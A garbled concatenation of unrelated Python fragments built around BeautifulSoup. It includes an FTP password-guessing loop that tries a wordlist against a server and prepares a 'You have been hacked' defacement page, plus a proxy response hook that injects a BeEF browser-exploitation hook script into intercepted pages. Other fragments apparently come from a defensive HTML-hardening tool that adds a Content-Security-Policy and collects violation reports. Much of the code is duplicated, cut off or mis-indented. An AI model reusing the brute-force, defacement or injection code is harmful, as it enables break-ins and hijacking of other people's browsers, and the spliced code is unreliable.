def change_data_file(self, login_to_server, ip, file_name, ):
self.login_to_server = login_to_server
# self.pas_for_ftp = pas_for_ftp
self.ip = ip
self.file_name = file_name
file = "pasw.txt"
br = Anon(useragent, proxies)
pf = open(file, 'r') #open a password file
for line in pf.readlines():
pas_for_ftp = line.strip('\r').strip('\n')
try:
print "login_to_server - ", self.login_to_server
# print "pas_for_ftp - ", self.pas_for_ftp
print "IP - ", self.ip
print "file_name - ", self.file_name
url = "ftp://" + self.login_to_server + ":" + pas_for_ftp + "@" + self.ip + "/"
print url
url2 = url + self.file_name
print url2
response = br.open(url2)
soup = BeautifulSoup(response.get_data())
b = soup.prettify()
tag = soup.body
tag.clear()
soup = BeautifulSoup("<body></body>")
original_tag = soup.body
new_tag = soup.new_tag("p")
original_tag.append(new_tag)
tag = soup.p
tag.string = "You have been hacked"
a = soup.prettify()
print "File on server: ", b
print "File's change: ", a
request = Request(url2, data=b)
request.get_host()
request.get_data()
print "Done!"
break
# response = br.open(url2)
# html = br.response().get_data().replace("</b>", "< /b>")
# response = mechanize.make_response(html, [("Content-Type", "text/html")], url2 , 200, "OK")
# br.set_response(response)
# html = br.response().get_data().replace(b, a)
# response = mechanize.make_response(html, [("Content-Type", "text/html")], url2 , 200, "OK")
# br.set_response(response)
# html2 = br.request().get_data().replace(b, a)
# mechanize.request_host(html2)
except:
print "[*]password", pas_for_ftp, "is incorrect"
def get_script():
# note that vendor folder only exists after successful build with gulp
preview_script_src = '/'.join([CLIENT_DIST_PATH, 'vendor', 'require.js'])
print(preview_script_src)
soup = BeautifulSoup()
script = soup.new_tag('script')
script['src'] = preview_script_src
script['data-main'] = '/'.join([CLIENT_DIST_PATH, 'main'])
script['type'] = 'text/javascript'
return script
def response(self, flow):
with decoded(flow.response): # Remove content encoding (gzip, ...)
html = BeautifulSoup(flow.response.content)
"""
# To Allow CORS
if "Content-Security-Policy" in flow.response.headers:
del flow.response.headers["Content-Security-Policy"]
"""
if html.body:
script = html.new_tag('script', src=self.urlhook)
html.body.insert(0, script)
flow.response.content = str(html)
self.send_output.emit("[{}] Injected BeFF url hook...".format(
self.Name))
# Write JS to a new file
from datetime import datetime as d
file_index += 1
curr_time = d.now().strftime('%d_%m_%Y_%H_%M_%S')
inline_file_name = 'js/inline_'+ curr_time + '_'+str(file_index)+'.js'
print ("-------------------------------------------------------------------------------------------------------")
print ("Found some inline JS. Making a new file {} and including it in Hybrid Guard.\nCode in inline JS is:".format(inline_file_name))
print (''.join(script.contents))
print ("-------------------------------------------------------------------------------------------------------")
with open(inline_file_name, 'w') as f:
f.write(''.join([x.encode('utf-8').strip() for x in script.contents]) + '\n')
hg_funcs.append(inline_file_name)
script.decompose()
hybrid_guard_js = "js/HybridGuard.js"
new_tag = html_soup.new_tag("script", src=hybrid_guard_js)
html_soup.head.append(new_tag)
print ("Backing up {} to {}".format(args.input_html[0], 'original_' + args.input_html[0]))
os.rename(args.input_html[0], 'original_' + args.input_html[0])
with open(args.input_html[0], 'w') as f:
f.write(str(html_soup))
print("Copying HybridGuard.js and policy_config.json to js/ : {}".format(args.hybrid_guard_file[0]))
shutil.copyfile(args.hybrid_guard_file[0], hybrid_guard_js)
package_json_file = re.sub('HybridGuard.js', 'policy_config.json', args.hybrid_guard_file[0])
print("\nPackage_config.json path : {}".format(package_json_file))
shutil.copyfile(package_json_file, "js/policy_config.json")
print ("Modifying Hybrid Guard file:{}".format(hybrid_guard_js))
with open(hybrid_guard_js) as f:
hg_file_contents = f.readlines()
# # Write JS to a new file
# from datetime import datetime as d
# file_index += 1
# curr_time = d.now().strftime('%d_%m_%Y_%H_%M_%S')
# inline_file_name = 'js\\inline_'+ curr_time + '_'+str(file_index)+'.js'
# print ("-------------------------------------------------------------------------------------------------------")
# print ("Found some inline JS. Making a new file {} and including it in Hybrid Guard.\nCode in inline JS is:".format(inline_file_name))
# print (''.join(script.contents))
# print ("-------------------------------------------------------------------------------------------------------")
# with open(path_to_hybrid +"\\"+ inline_file_name, 'w', encoding='utf8') as f:
# f.write(''.join([x.strip() for x in script.contents]) + '\n')
# hg_funcs.append(inline_file_name.replace("\\","/"))
# #delete the script tag from index.html
# script.decompose()
new_tag = html_soup.new_tag("script", src="js/HybridGuard.js")
html_soup.head.append(new_tag)
print ("Backing up {} to {}".format(input_html, input_html_splitted))
os.rename(input_html, input_html_splitted)
with open(input_html, 'w', encoding="utf8") as f:
f.write(str(html_soup))
print("Copying HybridGuard.js and policy_config.json to js/ : {}".format(HG_file_path))
shutil.copyfile(HG_file_path, hybrid_guard_js)
package_json_file = re.sub('HybridGuard.js', 'policy_config.json', HG_file_path)
print("\nPackage_config.json path : {}".format(package_json_file))
shutil.copyfile(package_json_file, path_to_hybrid + "\\js\\policy_config.json")
print ("Modifying Hybrid Guard file:{}".format(hybrid_guard_js))
with open(hybrid_guard_js, 'r', encoding='utf8') as f:
hg_file_contents = f.readlines()
curr_time = d.now().strftime('%d_%m_%Y_%H_%M_%s')
if not os.path.isdir('./js'):
os.makedirs('./js')
inline_file_name = 'js/inline_' + curr_time + '.js'
print(
"Found some inline JS. Making a new file {} and including it in Hybrid Guard.\nCode in inline JS is:"
.format(inline_file_name))
print(''.join(script.contents))
with open(inline_file_name, 'w') as f:
f.write(''.join([x.strip() for x in script.contents]) + '\n')
hg_funcs.append(inline_file_name)
script.decompose()
# Append Hybrid Guard script tag
hg_script_tag = html_soup.new_tag('script',
src="js/hybridGuard.js",
type="text/javascript")
html_soup.body.insert_before(hg_script_tag)
print("Backing up {} to {}".format(args.input_html[0],
'original_' + args.input_html[0]))
os.rename(args.input_html[0], 'original_' + args.input_html[0])
with open(args.input_html[0], 'w') as f:
f.write(str(html_soup))
print("Modifying Hybrid Guard file:{}".format(args.hybrid_guard_file[0]))
with open(args.hybrid_guard_file[0]) as f:
hg_file_contents = f.readlines()
last_index = hg_file_contents.index('})();\n')
if not last_index:
import re
js_whitelist = ['cordova', 'jQuery']
whitelist_pattern = re.compile('(' + '|'.join(js_whitelist) + ')', re.I)
# print(whitelist_pattern)
file_index=0
input_html_splitted = input_html.split("\\")
path_to_hybrid = ("\\").join(input_html_splitted[:-1])
input_html_splitted[-1] = 'original_' + input_html_splitted[-1]
input_html_splitted = ("\\").join(input_html_splitted)
# pdb.set_trace()
script_soup = BeautifulSoup('<meta http-equiv="Content-Security-Policy" content="default-src \'self\' data: gap: https://ssl.gstatic.com ;script-src \'self\' \'nonce-2726c7f26c\';style-src \'self\'; media-src * ; connect-src https://dry-meadow-56957.herokuapp.com ; ">','html.parser')
# pdb.set_trace()
html_soup.head.insert(1,script_soup)
package_hg= ' var package_name="{}";\n'
tag = html_soup.new_tag("script")
tag.append(package_hg.format(path_to_hybrid.split("\\")[-3]))
# tag.append(' document.addEventListener("securitypolicyviolation", (e) => {\n')
# tag.append('if(e.violatedDirective != "style-src-attr" && e.violatedDirective != "style-src-elem"){\n')
# tag.append('alert(e.blockedURI);\n')
# tag.append('alert(e.violatedDirective);\n')
# tag.append('alert(e.originalPolicy);\n')
# tag.append('xhttp.open("POST", "https://dry-meadow-56957.herokuapp.com/log_csp_data?appname="+package_name+"&errors="+e.violatedDirective+":"+e.blockedURI+", true);\n')
# tag.append("xhttp.send();\n")
# tag.append(';} } )\n')
tag.append('var listofErrors = []\n')
tag.append('document.addEventListener("securitypolicyviolation", (e) => {\n')
tag.append('if (e.violatedDirective != "style-src-attr" && e.violatedDirective != "style-src-elem"){\n')
tag.append('listofErrors.push(encodeURI(e.violatedDirective)+":"+encodeURI(e.blockedURI))\n')
tag.append('}\n')
tag.append('})\n')
